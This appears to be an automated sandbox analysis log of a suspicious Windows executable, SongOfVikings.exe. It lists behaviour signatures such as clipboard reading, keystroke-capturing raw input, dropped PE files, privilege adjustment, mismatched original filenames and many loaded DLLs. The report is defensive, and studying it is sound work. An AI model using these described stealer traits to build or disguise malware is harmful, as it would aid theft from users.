Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\SongOfVikings.exe

0_2_00405461

Installs a raw input device (often for capturing keystrokes)

Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_2937931d-9

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\SongOfVikings.exe	File dump: SongOfVikings.exe.0.dr 162141184			Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File dump: SongOfVikings.exe0.0.dr 162141184			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\SongOfVikings.exe

0_2_0040338F

Detected potential crypto function

Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00406B15	0_2_00406B15
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004072EC	0_2_004072EC
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00404C9E	0_2_00404C9E

Enables security privileges

Source: C:\Users\user\Desktop\SongOfVikings.exe

Process token adjusted: Security

Jump to behavior

PE file contains more sections than normal

Source: SongOfVikings.exe0.0.dr	Static PE information: Number of sections : 15 > 10
Source: libEGL.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.0.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libEGL.dll0.0.dr	Static PE information: Number of sections : 11 > 10
Source: SongOfVikings.exe.0.dr	Static PE information: Number of sections : 15 > 10

Sample file is different than original file name gathered from version info

Source: SongOfVikings.exe, 00000000.00000003.1836425269.0000000006E10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename< vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1843324879.00000000051BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1902908317.00000000051B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1778995184.0000000006036000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1851320142.00000000051BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename< vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameElevate.exeH vs SongOfVikings.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll
